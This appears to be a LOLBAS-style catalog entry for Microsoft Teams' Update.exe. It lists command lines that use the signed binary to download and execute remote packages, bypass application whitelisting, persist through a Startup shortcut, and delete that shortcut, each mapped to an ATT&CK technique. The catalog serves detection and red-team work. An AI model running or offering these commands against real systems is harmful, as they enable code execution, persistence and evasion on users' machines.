.. /Update.exe
Star

Download
AWL bypass (Nuget, Remote, CMD)
Execute (Nuget, Remote, CMD, EXE)

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Paths:

Resources:

Acknowledgements:

Detections:

Download

  1. The above binary will go to url and look for RELEASES file and download the nuget package.

    Update.exe --download {REMOTEURL}
    Use case
    Download binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218

AWL bypass

  1. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    Update.exe --update={REMOTEURL}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  2. The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

    Update.exe --update={PATH_SMB:folder}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  3. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    Update.exe --updateRollback={REMOTEURL}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  4. Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.

    Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
    Use case
    Application Whitelisting Bypass
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD
    Execute: Remote
  5. The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

    Update.exe --updateRollback={PATH_SMB:folder}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote

Execute

  1. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    Update.exe --update={REMOTEURL}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  2. The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

    Update.exe --update={PATH_SMB:folder}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  3. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    Update.exe --updateRollback={REMOTEURL}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  4. The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

    Update.exe --updateRollback={PATH_SMB:folder}
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: Nuget
    Execute: Remote
  5. Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.

    Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
    Use case
    Execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD
  6. Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.

    Update.exe --createShortcut={PATH:.exe} -l=Startup
    Use case
    Execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1547
    Tags
    Execute: EXE
  7. Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.

    Update.exe --removeShortcut={PATH:.exe}-l=Startup
    Use case
    Execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1070
    Tags
    Execute: EXE